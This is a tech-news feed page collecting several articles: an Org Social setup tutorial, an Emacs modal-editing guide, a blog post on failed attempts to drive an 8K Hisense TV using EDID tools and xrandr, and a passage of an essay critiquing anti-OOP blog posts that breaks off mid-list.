Quick tutorial to get started on Org Social

Lobsters
en.andros.dev
2025-11-25 09:02:48
Comments...
Original Article

Org Social is a very peculiar decentralized social network, as it works from text files in Org Mode format. Each user interacts through their own social.org file, which they modify with their favorite editor. In this plain text file, you create posts, participate in conversations, leave comments in groups, react, create polls, vote, and much more. All this without depending on a centralized server, without algorithms deciding what you see, without registration, always with total control of your content.

How does it work?

An Org Mode file doesn't have the ability to communicate with other files by itself. To make the magic of Org Social happen, several elements need to work together in perfect harmony:

  • The social.org file : Where you and your posts live.
  • A web hosting service : Where you upload your file so others can read it (for example, GitHub Pages, Cloudflare Pages, etc.) or any web server (Nginx, Apache, etc.). You also have host.org-social.org available.
  • A domain or public URL : The web address where your file is located (for example, https://my-domain.com/social.org ). host.org-social.org provides you with a public URL automatically.
  • An Org Social client ( org-social.el , for example) : Responsible for reading the social.org files of other users you follow, and creates the timeline with their posts, replies, etc.
  • A relay (optional) : A service that indexes public social.org files so clients can easily discover new users and be notified if strangers interact with you. If you use org-social.el , this step is done automatically; you can ignore it.

Therefore, for someone to read your latest post, the following happens:

flowchart TD
    A[User creates social.org] --> B[Upload social.org to a web hosting service]
    B --> C[The social.org file is available at a public URL]
    C --> D[Another user uses a client org-social.el]
    D --> E[The client downloads social.org from the public URL]
    E --> F[The client displays the posts in the user's timeline]
  1. You add a post to your social.org file using your text editor (Emacs, for example).
  2. You upload the modified file to a web hosting service or sync with host.org-social.org .
  3. Another user, who is following you, opens their client (like org-social.el in Emacs).
  4. The client downloads your social.org file from the public URL where you hosted it, and all the other users they follow.
  5. The client generates a timeline with all the posts, replies, etc., (similar to X/Twitter, Mastodon, etc.) for the user using it. And among those posts will be yours.

To read their posts, the process is the same but in reverse.

Just plain text files and public links! All the syntax that the client understands, the Relay processes, and you write is called Social Org .

Are you ready to get started?

Step 1: Register on a hosting service

You need to put your future social.org on the Internet so others can read it. To do this, you should use a web hosting service (GitHub Pages, Cloudflare Pages, etc.) or your own web server (Nginx, Apache, etc.). However, there's a faster alternative: host.org-social.org , a free service for hosting social.org files that will simplify your first steps and interactions with other users.

Go to https://host.org-social.org/signup and register with an alias you like. Warning! You won't be able to change it once created.

Write down VERY CAREFULLY the VFile Token and the Public URL that are provided to you. You won't be able to recover them if you lose them and they are essential to not lose your account.

Step 2: Install and configure org-social.el

Now comes the fun part: installing the Emacs client for Org Social. This client will allow you to read posts from other users and easily create new posts among many other functions.

M-x package-install RET org-social RET

In your Emacs configuration, add:

(setq org-social-file "YOUR VFILE")
(setq org-social-relay "https://relay.org-social.org/")
(setq org-social-my-public-url "YOUR PUBLIC URL")

And change:

  • YOUR VFILE to the token you were given at host.org-social.org
  • YOUR PUBLIC URL to the public URL you were given at host.org-social.org

Don't modify org-social-relay . Perhaps in the future you can change it if you use another relay, but for now leave it as is.

Now restart Emacs or evaluate those lines so the changes take effect.

Step 3: Create your first post

The time has come to interact with the Org Social network. Let's create your first post.

In Emacs, run:

M-x org-social-timeline

This will open the Org Social interface without much content, since you're not following anyone yet.

Now:

  1. Press n (for "new post") or click the "New Post" button in the top bar. A new Org buffer will open so you can write your post.
  2. Write your message, for example: "Hello Org Social!"
  3. Save the buffer with Ctrl + x and then Ctrl + s

Take the opportunity to configure your profile. Edit these lines at the beginning of the social.org file with your data:

#+TITLE: My journal on Org Social
#+NICK: YourNickWithoutSpaces
#+DESCRIPTION: I'm new to Org Social. I like [your interests here]

Save again: Ctrl + x and then Ctrl + s .

You now have your first post created! It will automatically upload your social.org file to host.org-social.org, register you on the network (Relay), and other users will be able to read you. Try opening your public URL in a web browser to see your social.org file.

Step 4: Follow other users

Now that you have your profile working, it's time to discover other users.

Click on "Discover" in the top bar to see a list of users. You can follow any of them by clicking the "Follow" button next to their name or by adding their URL in the header of your social.org file with the following syntax:

#+TITLE: Bob's journal
#+NICK: Bob
#+FOLLOW: https://alice.com/social.org
#+FOLLOW: myBestFriend https://jane.com/social.org

You can open your file at any time with org-social-open-file .

Next steps

Now that you have the basics, you can explore:

  • Create polls
  • Join groups
  • Use mentions to tag other users
  • Post with rich formatting (tables, code, images)
  • Have a personal blog (with its own RSS feed)

The important thing is that you keep experimenting and having fun with Org Social. Welcome to the community!

emacs for code editing

Lobsters
redpenguin101.github.io
2025-11-25 07:58:27
Comments...
Original Article

Editing Code in Emacs

When you write code, you want to focus on the code, not on the text of the code. This means a) you have to have a good text editing setup, and b) you need to have a muscle-memory level instinct for using that setup. The second comes with practice and with consistency (i.e. not changing your config too much too quickly). The first is what I will talk about here.

This document is meant for people who are current users of, or at least slightly familiar with Emacs. I won’t spend much time explaining Emacs basics - for example how incremental search, or compilation buffers work (I would recommend Mastering Emacs for that). But I will give rationales for the choices I’ve made in encouraging or discouraging certain patterns.

You can read this in two ways: The general Emacs commands I use to try to edit the text of programs efficiently, and the specific keybinds I use in my modal ‘command’ mode to make those commands as convenient as possible.

No Mouse, No Arrows

All text editing practices rely on minimising the work your fingers do by minimising the number of keystrokes and keeping your fingers as close to the home row as possible. This means no arrow keys and no mouse. This can be enforced by remapping your arrow keys to ignore , and by installing the package disable-mouse .

Editing code is different from writing prose in that you spend a lot more time moving around the document, and moving things around in the document, than actually writing text. The actions for moving are more important than the actions for typing, and should therefore be closer to hand. This is the premise of modal editing : the “default” actions of most keyboard keys are to move, not to type. For example in the default ‘mode’, hitting ‘a’ doesn’t type the ‘a’ character, it moves the cursor to the start of the line. To actually type things, you need to hit a special key which puts you in ‘insert’ mode. Then when you are finished typing, you hit another key which puts you in the default (or ‘command’) mode.

My modal system is custom written and very lightweight - about 150 lines, not including the keybinds themselves. I recommend using a modal system, if not mine then someone elses, such as Evil or Meow. But if you really dislike them, you can still do everything I describe here in vanilla emacs, and most of the commands already have default keybinds. There are only four ‘custom’ functions I use: the half page scrolls, and the kill-whole-word/sexp. And all are very simple.

A note on defaults

A problem with customised setups is that they mean you can’t pick up your friend’s Emacs setup and use it, because your muscle memory will cause you to hit all the wrong keys. This effect can be mitigated by sticking with the ‘language’ of the system. Emacs has pretty clear (if arguably not very good) conventions for most of it’s keys: f means forward, n means next, C-g is always ‘cancel’. My setup tries to stick with these conventions as much as possible. f in command mode is ‘forward-word’. n is ‘next line’.

Additionally there is basically no remapping for insert mode . The idea being that editing in a vanilla Emacs is the same as editing using only insert mode in my setup. I find that you spend a fair amount of time navigating from within insert mode even in my setup, so you won’t lose your muscle memory.

Leaders

The most common actions for moving around the screen are on a single keystroke on command mode. For example, to go to the next line, you hit n . To go forward by a word, press f .

Less common, but still important commands are usually two or three keystrokes. For example, save file is vs . Kill word is kf . In these cases, the first key is a ‘leader’ key. I use a few leader keys:

  • v : A general leader key, but mostly for file, buffer and window operations.
  • k : Kill leader: most of the kill commands are under this.
  • s : Search leader: most searches are under this
  • vp : Project leader: contains several operations that are useful when working on a ‘project’ that consists of many files, which is very common with programming projects.

Getting in and out of insert mode

To transition from command to insert mode, press i . To transition from insert to command mode, press C-j .

There are a few more ways to get into insert mode:

  • I : Insert after character
  • O : Insert in overwrite mode (overwrite mode will be cancelled when you return to command mode)
  • A : Insert at start of (indented) line
  • E : Insert at end of line
  • C-RET : Newline and insert
  • S-RET : Newline above and insert

Moving Vertically

I recommend you set up relative line numbers, and global-hl-line-mode so you can clearly see which line your cursor is on and how far away each line is.

(setq-default display-line-numbers-type 'relative)
(global-display-line-numbers-mode 1)
(global-hl-line-mode +1)

In command mode press n to move to the next line, and p to move to the previous line. Often they will be used in conjunction with a numeric prefix: type 12n to move down 12 lines. This number-prefix pattern is general: you can do most commands multiple times by typing digits before typing the command.

r moves up by a half page, and t moves down by a half page while keeping the cursor line in the middle of the screen. These are used in preference to the usual scroll-up and scroll-down commands, which move so much you have to spend a second reorienting.

Two useful and related actions are recenter-top-bottom and move-to-window-line-top-bottom . These are bound to l and L respectively. l moves the screen around the current highlighted line - first centring the screen around the hl-line, then putting the hl-line at the top of the screen, then at the bottom. It’s best to just try it out. L is sort of the opposite, it moves the cursor around the screen, first to the center, then to the top, then to the bottom.

. and , are ‘beginning-of-defun’ and ‘end-of-defun’. You can think of these as moving by a top level ‘block’. These are usually pretty useful, but depend on your language mode having a good definition for what a ‘block’ is.

Less often used, but occasionally useful, are < and > for moving to the beginning and end of the current buffer.

Moving Horizontally

Moving horizontally is important, but when programming you should really avoid using these commands too much in favour of moving in larger syntactic units - see the later sections on moving by expression and search.

You should turn on subword mode:

(global-subword-mode 1)

When moving horizontally, try to move in as large a unit as you can. You should almost never move left or right by an individual character. The smallest general unit is a “word” - similar to how most editors will use Ctrl-Right to move right by a word. To move forward by a word, press f . To move backward by a word, press b .

The definition of a ‘word’ in Emacs can be a bit tricky, especially when it comes to programming. foo_bar_baz is three words. fooBarBaz (if you’ve got subword mode turned on) is also three words. So for either of these, if your cursor is on the f of foo , pressing f to go forward will put you before the baz symbol. This is handy for changing things within a long variable name. But it’s not great for rapid navigation. Which is why I recommend moving by expression over moving by word .

If you must move by a single character, use C-f and C-b respectively.

e moves to the end of the current line. a moves to the start of the current line, but generally you should prefer m , which moves to the first non-whitespace character of the line - which is usually what you want when programming. However, if I’m trying to move to the start or end of a line, it’s usually because I want to type something there. And for doing that you can use A and E respectively, which will move to the start or end of the line and immediately enter insert mode.

This is it for moving strictly within a line. But for the various reasons outlined above, you really you shouldn’t use these too much. There are better ways to move within a line: moving by expression and moving by search.

Moving by Expression

S-Expressions, or Sexps, are a big thing in lisps and therefore in Emacs. Most programming languages are syntactically ‘blocks’ of symbols enclosed in different bracket types. Many use curly braces to denote execution blocks - function bodies, loops, structure definitions - square brackets to denote arrays, and parentheses to denote parameter/argument lists. All fit the s-expression definition. When you’re moving around a program it can be useful to think in terms of jumping in to, out of, over, or within those blocks. Emacs has lots of commands for this, and there are extensions which add even more, but I really only use four.

j moves forward by a sexp. If the cursor is over an opening bracket of any kind, pressing j will jump over that whole block. h will do the same thing, but backwards. This can effectively be used as a ‘jump to matching bracket’ command.

If on a non-bracket character, these will jump forward or back by one syntactic symbol. This should generally be preferred to moving by word because in most cases when programming you want to jump over the symbol, not the word. For example if are at the start of the variable name foo_bar_baz , unless you want to change something in that variable, you probably want to jump over the whole thing. j will do that, whereas f will jump you to bar .

The other two I use are ‘down-list’ ( d ) and up list ( u ). These jump into and out of a block. For example if my editor looks like this, where | is the cursor position: dele|te(state.im_temp_entity_buffer) , and I hit d , the cursor will be moved into the next block - in this case the argument list for delete: delete(|state.im_temp_entity_buffer) . Pressing u will move the the cursor out of that list: delete(state.im_temp_entity_buffer)| . This works on any type of brackets. These can also be used with a negative argument (e.g. -d ) to go back into and back out of an expression. You can reverse the above sequence with -d , resulting in delete(state.im_temp_entity_buffer|) , and then -u resulting in delete|(state.im_temp_entity_buffer) .

Using these sexp expressions when programming is usually far more effective than using the horizontal movements like ‘forward-word’, and you should get into the habit of preferring them.

Sexps are great, but really the best way to move more than a few words around your buffer is to move by searching for the string of text you want to jump to. If the location you want to jump to is on the screen, this creates a sort of ‘look at, jump to’ dynamic, where you find where your want your cursor to be with your eyes, type some of the text at that location, and your cursor is now there. But it also works great if the location you’re looking for is off the screen.

The simplest commands are the usual ‘isearch-forward’ and ‘isearch-backward’. The mappings for these are unchanged from standard Emacs: C-s and C-r . There are packages which provide alternative versions of this - ‘jump-char’ and ‘avy’, for example - but I find these work fine.

Sometimes you’re searching for something that is pretty common, and using incremental search is a slog. In this case, you can use occur, with so , which creates a buffer with all the instances of the search term, hyperlinked so you can easily jump to that location.

How to use occur not specific to my setup, but is very useful to learn, so I’ll go into some detail. When you are in an occur buffer:

  • M-n and M-p will move up and down, but won’t jump the original buffer to the relevant line
  • n and p will do the same, but it will update the original buffer to show the line
  • M-g M-n and M-g M-p will not only update the original buffer to show the selected line, but it will make the original buffer active at that location. A bit hard to explain in words, but it’s very useful, try it out.

The other useful thing about occur is that, while it’s read only by default, you can make it editable with e . And from here you can edit the original buffers from in the occur window. Huge. Get back to read-only mode with C-c C-c

You can also create an occur window for multiple buffer with multi-occur-in-matching-buffers . But I find that a bit fiddly. What I would really like is a ‘project-occur’ which searches for all instances of a term in a current project. But Emacs doesn’t have that built in that I’m aware, though I believe it’s in the common ‘projectile’ external package. I use the ‘ag’ package and silver-surfer search program to search project-wide for terms, but it’s not ideal.

Registers and the Mark

Another way to quickly jump around a buffer is to use registers. These are short lived ‘bookmarks’, which you can set and return to. Typically I’ll use these when I want to temporarily jump to another location from a point I’ll want to return to afterwards. For example, jumping into a function from the calling location, then back out to the calling location. Typically I’ll hit v SPC a to set my current location to the register a . Then jump to the other place. Then when I’m done, vja will take me back to my original location. If I want to chain these together, I’ll use the registers a , s d and f as a sort of ‘stack’ Often I’ll also want to jump between two locations repeatedly, so I’ll set them up as a and s .

An alternative way to get the above behaviour is to the use the ‘mark’ as a very transitory, but automatic, register. When you do most ‘jumps’ in emacs, e.g. using isearch, a temporary register called the ‘mark’ is created in the place you jumped from. Or, you can set it manually using gg .Then, you can jump to that mark (resetting it to the place you jumped from in the process) with C-x C-x . This is a like the a and s pattern I described above, but with the advantage that you don’t have to set the register yourself. You can also ‘pop’ the mark by hitting C-u g . And you can do this repeatedly by hitting C-u g g g . The downside being that the mark is less permanent than the registers, so you can accidental set it to something else, and you’ll find your jumps will take you somewhere you don’t expect, which is disorienting. For that reason I usually use manual registers.

Find and replace

While you can use occur mode to do find-replace, generally it’s easier to use sq (query-replace). This is both standard emacs functionality and works basically the same as other editors find-replace so I won’t go into how it works.

A variant on that is vpq , which is project query-replace. It works the same way, but runs through every file in your project, not just the current buffer.

Killing, or Cut Copy Paste

In the hierarchy of importance of operations in program text editing, moving around the buffer is top, cut/copy/paste is second, and typing is third.

We’ve seen that there are lots of options for moving around the screen using different syntactic units. Moving and ‘killing’ (as emacs called the operation that is usually called cut) are sort of ‘twinned’: for each move, there is usually an equivalent kill. And in my setup they are, where possible, on the same keys, just with a k prefix.

So kf is kill forward word, kj is kill forward sexp. A full list is below, but if you just think about how you move by a certain amount, you can usually get the equivalent kill function this way.

There are a few special cases for kills though. There is kf for kill forward word and kj for kill forward sexp, often what you want to do is kill the whole word/sexp you are currently in . These are the ki (kill whole word) and kn (kill whole sexp) commands. Similarly, ke will kill from your point to the end of the line, but more often you will want to ‘kill whole line’ kl .

A convenient (though often inefficient) thing to do is kill all the text in a highlighted region. You can do this is kw kill region. Or you can copy a region with ks kill save.

You will often find yourself wanting to kill from your cursor up to a certain character. Emacs calls this a ‘zap’, and you can do it with kz zap to character.

Finally, if you find yourself wanting to join the current line with the line above it, k6 will do that.

To paste, just hit y (for yank).

Here is the full list of kill commands.

  • kf kill word
  • kb kill back
  • kj kill sexp
  • kn kill inner sexp
  • kh kill sexp back
  • ke kill to end of line
  • kl kill whole line
  • kw kill region
  • ks kill ring save
  • k6 join line
  • kr kill rectangle
  • kz zap to character
  • ki kill inner word

File and window operations

When programming you spend a lot of time jumping between files and buffers within the ‘project’. The project usually being defined as the root of the source repo.

Most of these operations are mapped with the v leader key, and in the case of commands that operate on the whole project, vp . None of them are particularly unusual, so I’ll just list them:

Window commands

  • w delete other windows
  • o other window
  • v1 delete other window
  • v2 split window below
  • v3 split window right

File commands

  • vf find file
  • vpf project find file
  • vs save file
  • vps save project files
  • vr recent files (requires some custom setup)
  • vd dired
  • vpd project root dired

Buffer commands

  • vk kill buffer
  • vpk project kill buffers
  • vb switch buffer
  • vpb project switch to buffer

Other useful things that don’t fit anywhere else

Macros are surprisingly usable in Emacs, though they are something of an art. v[ starts defining a macro, v] ends it. vm applies the macro. You can apply it repeatedly with vmmmmm...

LSPs using Emacs LSP implementation eglot are something of a mixed blessing in my experience. I usually keep it turned off. But sometimes being able to use ‘xref-find-definition’ ( M-. ) and the improved tab completion is too useful to ignore.

‘comment-line’ ; I use all the time. If you have a region highlighted, it will comment out the region.

/ for ‘undo’, v\ for whitespace cleanup. q for ‘fill or reindent’ will usually tidy the formatting of whichever block you’re in. x is ‘execute command’. z is repeat.

Rectangle editing is often useful. Highlight the region you want to edit, and then kr to kill it, or vt to replace the rectangle with the thing you type. I find this works for most cases I would use multi-cursor in other editors.

vv opens the VC interface (magit, in my case).

I tend to use sh to highlight a phrase in a certain colour when I want something I’m currently working on to show up clearly.

vi for imenu, and vI for imenu-to-buffer are reasonable ways to browse your code by ‘section’, provided the major-mode implements it properly.

I disable a bunch of commands I sometimes hit accidentally with unpleasant consequences, most annoying the two ‘suspend’ shortcuts C-z and C-x C-z .

Non-editing Configuration

I have some other stuff in my configuration apart from the above keybindings. But most of it is either very common (fixing where temporary files are saved), or very specific to how I like to do things and not good general advice. For example I turn off transient mark mode, but I wouldn’t recommend it generally.

Tab completion can be a pain to get it how you like it. I use this, but it’s not perfect:

(setq-default indent-tabs-mode t)
(setq-default tab-width 4)
(setq tab-always-indent 'complete)
(setq tab-first-completion 'word)

I would recommend relying on as few external packages as possible. I use, and would recommend, these ones:

  • ag an interface to the silver-surfer search program. This is a way to search for a term across a whole project. grep is a reasonable alternative, but I prefer the silver surfer. Use it with sa
  • diff-hl : A utility for highlighting lines that have changed since your last commit.
  • magit : makes using git bearable (or possible, for things like rebasing)
  • visible-mark : indicate visually where the ‘mark’ is.

And a couple of other, language specific ones.

Why not vim?

No reason other than I’m used to emacs. There’s nothing here you couldn’t equally do with vim.

My init.el

Is here: https://github.com/RedPenguin101/dotfiles/blob/main/init.el

Russell Coker: EDID and my 8K TV

PlanetDebian
etbe.coker.com.au
2025-11-25 07:09:41
I previously blogged about buying a refurbished Hisense 65u80g 8K TV with the aim of making it a large monitor [1] and about searching for a suitable video card for 8k [2]. After writing the second post I bought an Intel Arc B580 which also did a maximum of 4096*2160 resolution. This post covers man...
Original Article

I previously blogged about buying a refurbished Hisense 65u80g 8K TV with the aim of making it a large monitor [1] and about searching for a suitable video card for 8k [2] . After writing the second post I bought an Intel Arc B580 which also did a maximum of 4096*2160 resolution.

This post covers many attempts to try and get the TV to work correctly and it doesn’t have good answers. The best answer might be to not buy Hisense devices but I still lack data.

Attempts to Force 8K

I posted on Lemmy again about this [3] and got a single response, which is OK as it was a good response. They didn’t give me the answer on a silver platter but pointed me in the right direction of EDID [4] .

I installed the Debian packages read-edid , wxedid , and edid-decode .

The command “ get-edid > out.edid ” saves the binary form of the edid to a file. The command “ wxedid out.edid ” allows graphical analysis of the EDID data. The command “ edid-decode out.edid ” dumps a plain text representation of the output, the command “ edid-decode out.edid|grep VIC|cut -d: -f2|sort -n ” shows an ordered list of video modes, in my case the highest resolution is 4096×2160 which is the highest that Linux had allowed me to set with two different video cards and a selection of different cables (both HDMI and DisplayPort).

xrandr --newmode 7680x4320 1042.63  7680 7984 7760 7824  4320 4353 4323 4328
xrandr --addmode HDMI-3 7680x4320
xrandr --output HDMI-3 --mode 7680x4320

I ran the above commands and got the below error:

xrandr: Configure crtc 0 failed

At this time I don’t know how much of this is due to the video card and how much is due to the TV. The parameters for xrandr came from a LLM because I couldn’t find any Google results on what 8K parameters to use. As an aside if you have a working 8K TV or monitor connected to a computer please publish the EDID data, xrandr, and everything else you can think of.

I found a Github repository for EDID data [5] but that didn’t have an entry for my TV and didn’t appear to have any other entry for an 8K device I could use.

Resolution for Web Browsing

I installed a browser on the TV, Chrome and Firefox aren’t available for a TV and the Play Store program tells you that (but without providing a reason) when you search for them. I tried the site CodeShack What is my Screen Resolution [6] which said that my laptop is 2460*1353 while the laptop display is actually 2560*1440. So apparently I have 100 pixels used for the KDE panel at the left of the screen and 87 pixels used by the Chrome tabs and URL bar – which seems about right. My Note 9 phone reports 384*661 out of it’s 2960*1440 display so it seems that Chrome on my phone is running web sites at 4/15 of the native resolution and about 16% of the height of the screen is used by the system notification bar, the back/home/tasklist buttons (I choose buttons instead of swipe for navigation in system settings), and the URL bar when I have “Screen zoom” in system settings at 1/4. When I changed “Screen zoom” to 0/4 the claimed resolution changed to 411*717 (2/7 of the native resolution). Font size changes didn’t change the claimed resolution. The claimed “Browser Viewport Size” by CodeShack is 1280*720 which is 1/6 of the real horizontal resolution and slightly more than 1/6 of the vertical resolution, it claims that the Pixel Density is 2* and a screen resolution of 970*540 which means to imply that the browser is only working at 1920*1080 resolution!

Netflix

When I view Netflix shows using the Netflix app running on the TV is reports “4K” which doesn’t happen on Linux PCs (as they restrict 4K content to platforms with DRM) and in the “Device” setting it reports “Device Model” as “Hisense_SmartTV 8K FFM” so the Netflix app knows all about 4K content and knows the text string “8K”.

YouTube

When I view a YouTube video that’s described as being 8K I don’t get a request for paying for YouTube Premium which is apparently what happens nowadays when you try to play actual 8K video. I turn on “State for Nerds” and one line has “Viewport / Frames 1920×1080*2.00” and another has “Current / Optimal Res 3840×2160@60 / 3840×2160@60” so it seems that the YouTube app is seeing the screen as 4K but choosing to only display FullHD even when I have Quality set to “2160p60 HDR”. It declares the network speed to be over 100mbit most of the time and the lowest it gets is 60mbit while 50mbit is allegedly what’s required for 8K.

I installed a few Android apps to report hardware capabilities and they reported the screen resolution to be 1920*1080.

Have I Been Ripped Off?

It looks like I might have been ripped off by this. I can’t get any app other than Netflix to display 4K content. My PC will only connect to it at 4K. Android apps (including YouTube) regard it as 1920*1080.

The “AI Upscaling” isn’t really that great and in most ways it seems at best equivalent to a 4K TV and less than a 4K TV that runs Android apps with an actual 4K display buffer.

Next Steps

The next things I plan to do are to continue attempts to get the TV to do what it’s claimed to be capable of, either an Android app that can display 8K content or a HDMI input of 8K content will do. Running a VNC client on the TV would be an acceptable way of getting an 8K display from a Linux PC.

I need to get a somewhat portable device that can give 8K signal output. Maybe a mini PC with a powerful GPU or maybe one of those ARM boards that’s designed to drive an 8K sign. Then I can hunt for stores that have 8K TVs on display.

It would be nice if someone made a USB device that does 8K video output – NOT a USB-C DisplayPort alternative mode that uses the video hardware on the laptop. Then I could take a laptop to any place that has an 8K display to show and connect my laptop to it.

The one thing I haven’t done yet is testing 8K MP4 files on a USB stick. That’s mainly due to a lack of content and the fact that none of the phone cameras I have access to can do 8K video. I will try displaying 8K PNG and JPEG files from a USB stick.

Most people would give up about now. But I am determined to solve this and buying another large TV isn’t out of the question.

Case against OOP is understated, not overstated (2020)

Lobsters
boxbase.org
2025-11-25 06:56:01
Comments...
Original Article

Here's something for nobody. We've been past this a long while ago now. OOP is one of those substances that stick to the wall if you throw it. Writing about it is almost always pointless because people who should learn refuse to learn, and everybody else has learnt their lesson.

I review and criticize "The Case Against OOP is Wildly Overstated" by Matthew MacDonald. The article itself references few other posts and I give the same treatment to those. You may have seen these before:

  1. Object-Oriented Programming --- The Trillion Dollar Disaster by Ilya SuzdaInitski
  2. Goodbye, Object Oriented Programming by Charles Scalfani
  3. Why OOP is bad by Konrad Musial
  4. OOP is dead by Karsten Wagner

I go through the main points of these posts so that you don't need to read them. Additionally we'll have :

  • A peek into Grady Booch's book from which "4 pillars of OOP" is claimed to originate from.
  • How the whole OOP is a lauded proglang hack to a record datatype .
  • Predictable alternative for polymorphism (parametric polymorphism).
  • Why pattern matching doesn't do dynamic dispatch but is instead a substitute for inheritance.
  • Misconceptions you might have about types.
  • Why "no" for multiple dispatch.
  • How "dog extends animal" is not evil because you got isomorphisms.
  • Logic programming hidden in sight at Haskell programming language.
  • Concluding with a methematical explanation why OOP sucks big time.

Not every weekend you get to see such a jewel in the sewer that's the Internet. Lets peek in!

Micro-summaries/reviews of OOP posts

On each post I'll go through the main points they had to say. Ilya's post was largest of them all with 27min read, the second largest was Karsten's post.

I've got my opinions inserted in and the things I pick up form the basis for subjects that the rest of this post covers.

The trillion dollar disaster

Ilya SuzdaInitski makes lot of claims but doesn't bother to present evidence. He makes that up by doing a lot and lot of claims. There are plenty of references to popular anti-OOP stuff so it's not a total loss. Also it's a structured post that's easy to skim unlike the others in this bunch.

The high point in this post is Edsger W. Dijkstra's quote "Object oriented programs are offered as alternatives to correct ones..." I chuckled at that one, yeah Dijkstra obsessed over correctness and I guess I've ended up to doing that as well.

All the claims:

  1. There's no evidence that OOP is better than plain procedural programming.
  2. Programming paradigms should constrain bad programmers from doing too much damage.
  3. Object oriented programming was supposed to be about messages and actors, rather than about objects and methods.
  4. OOP fails to keep the complexity because of shared mutable state, errorneous abstractions and low signal-to-noise ratio.
  5. Shared mutable state is hard to track and causes concurrency issues.
  6. Encapsulation is a trojan horse hiding mutable state.
  7. OOP tries to model the real world as objects and class trees through inheritance.
  8. OOP is difficult to unit test.
  9. Forms heavy dependencies between classes unless you create interfaces everywhere and then mock them.
  10. Difficult to refactor without tools.
  11. Mentions design patterns, SOLID, dependency injection as band-aids to OOP.
  12. Mentions abstraction, inheritance, encapsulation, polymorphism as four pillars of OOP with intent to refute these .
  13. OOP is popular due to Java.
  14. It's time to move on.
  15. You're already a functional programmer and learning functional programming makes you better.
  16. Usual defensive arguments are weak and probably never met a true functional language.
  17. Talks about Law of Demeter as useless under-the-rug-sweep.
  18. People try to discredit anything that claim OOP sucks.

Notable references:

  1. Mentions functional programming and Linus Tolvalds hating on C++ programming.
  2. Alan Kay's famous quote and refers to Erlang as a "pure form" implementation of OOP.
  3. Stevey Yegge's blogpost "Execution in the Kingdom of Nouns". I prefer the PDF version of Yegge's post . It's criticizing Java programming language for sticking to OOP. I somehow remembered you could find it from the old WikiWikiWeb but I didn't find it there. Just thought it might be fun to remember that site.
  4. Reference to problem factory. I'm sure this is a reference. I just don't know this one. Help welcome! Remind me where the problem factory -term originated from? Yes, there's a design pattern called 'factory', I don't ask about that.
  5. Reference to Joe Armstrong's "Banana, Gorilla, Jungle" -quote.
  6. Transition from horses to automobiles used as argumentation device.

First of all, Alan Kay's remark about classes and objects cannot be used against OOP. Classes and objects were featured in Simula programming language and it went along from there. That it was inspired by something potentially better doesn't demerit it. OOP is a datatype customization feature with an overinflated ego. It exposes decades old implementation details and makes them a principal model where you do programming.

The conception that you discard shared mutable state when you stop doing OOP is the thing that keeps people in. You can do "immutable" OOP and it's not any better!

Taxonomies and attempts to understand the world through them aren't OOP's problem. Besides when you pick this up they point out that you're not supposed to write classes such as a "Car" or a "Banana" and they're just as wrong as Ilya is wrong claiming the opposite.

OOP was verbose from the beginning and it didn't prevent it from going. You're supposed to buy stuff with that verbosity so bickering about "low-signal-to-noise" ratio receives eye rolls only.

They're going to tell you that they're using tools for refactoring and just declare interfaces everywhere so that it can be unit tested. IDE refactors the boilerplate code so they don't worry about it. Interfaces and mocks just everywhere and it is not a problem.

On claims of unit testing and OOP , I'm not going to go there much more because I still don't unit test my stuff. I'm currently not against it. I just don't know about it much. I find it much easier to formally verify things correct than to test that they're correct.

OOP precedes Java. C++ was raging hot popular object oriented language before Java became popular.

Goodbye, Object Oriented Programming

Charles Scalfani was "gung-ho to leverage the benefits of Inheritance, Encapsulation and Polymorphism". He was disappointed that the planes didn't land to his backyard.

  1. Half the post is about the banana-monkey-jungle problem.
  2. Other half is about the fragile base class and contain-and-delegate as a solution to it.
  3. Categorical hierarchies (taxonomies) don't work for programming?
  4. Encapsulation doesn't work because it hides stateful variables.
  5. You don't need object oriented programming for polymoprhism. Presents interface-based polymorphism as an alternative.
  6. Shills Elm. Lol. (Scalfani's post is from 2006)

These guys attack the pillars of OOP a lot. This is why I did look into Grady Booch's book.

I guess it'll be also time to talk about these taxonomies and maps. Is this going to be the programmer equivalent of bees and flowers talk?

The fragile base class -problem seem to be well-covered and settled and has not affected the remaining discussion, so I didn't cover that one here. What it's about: Seemingly safe modifications to a base class may cause the derived classes to malfunction. The programmer cannot determine whether base class modification is safe simply by examining the base class in isolation.

He mentions interface-based polymorphism as an alternative but doesn't say what it is or link to anything!

Elm has become a laughing stock. They skipped typeclasses in hopes that something better appears. So far they're still waiting for it and they got full libraries. They've done plenty of things to make it simple for a beginner but when it comes to retaining users, LOL. The language enforces its own best practices and it's getting to your way by limiting the size of tuples that you can make, tripping your homogeneous coordinate construction, and banning undefined/absurd in release.

Here's absurd from Idris, so you get some idea what they prevent in release.

absurd : Uninhabited t => t -> a

Non-dependent languages don't have this, but they got undefined for the same purpose. Elm has this too but it's in debug module and prevents its use in release. It's very fun to wrap the function into a maybe and handle it without the maybe monad, or come up with a placeholder value, when you know for certain that it's something that means the program has something very badly wrong if it happens. Nah, it's Nothing , tells Elm!

Why OOP is bad

Konrad Musial tells how he used to be excited about OOP. He learned about circles and ellipses as objects with properties. This is a story about struggling to understand OOP. As an example he throws in a bit of C#. Glancing at this code, it's not particularly complex but sprinkled with attributes like this [Serializable] here.

[Serializable]
public class SampleClass {}

These aren't technically even OOP. They're C#'s way to give code additional declarations and structure that can be used for metaprogramming. It's one of the flagship features of C#, something you should definitely know how to use if you're going to use that language.

The post is filled with popular anti-OOP quotes and in the end he tells us he figured it out and went back to doing OOP. Week or two later he wrote "Why OOP is Awesome". That you don't understand something doesn't mean it's flawed or bad.

This one is a prose-formed text and it's not the only. I struggled to go through these despite them being shortest in the bunch. It requires that I read the whole text through in at an one throw. I just recently figured out myself the pieces I was missing to writing effortlessly skimmable texts . I don't say that I perfected it but you're reading one text that's been almost written in this style.

OOP is dead

Karsten Wagner thinks OOP reached its peak and is on the decline. Interest is increasing toward functional programming languages and concepts such as closures and continuations. To respond, languages that used to be "OO" have begun to integrate new features into themselves.

  1. States new features do not necessarily ease software development.
  2. There will be too many features and mixing them up will be worse than using handful of them consistently.
  3. Functional programming is doing it better, there pattern matching replaces multiple dispatch.
  4. Thinks OOP failed to live up to its promise and lists few reasons.
  5. Shills multiple dispatch as a solution to float~int conversion in addition.
  6. You can use relational data models instead of wrapping things into objects.
  7. Believes people start using OOP-languages in non-OOP way.
  8. It's possible to write interactive programs without having mutation of data. Mentions Monads.
  9. Boasts referential transparency as the important thing about functional programming.

List of reasons why he thinks OOP failed to live up to its promise:

  1. "this" -parameter in the method call is too special. Mentions problems that arise when you have to act on multiple parameters.
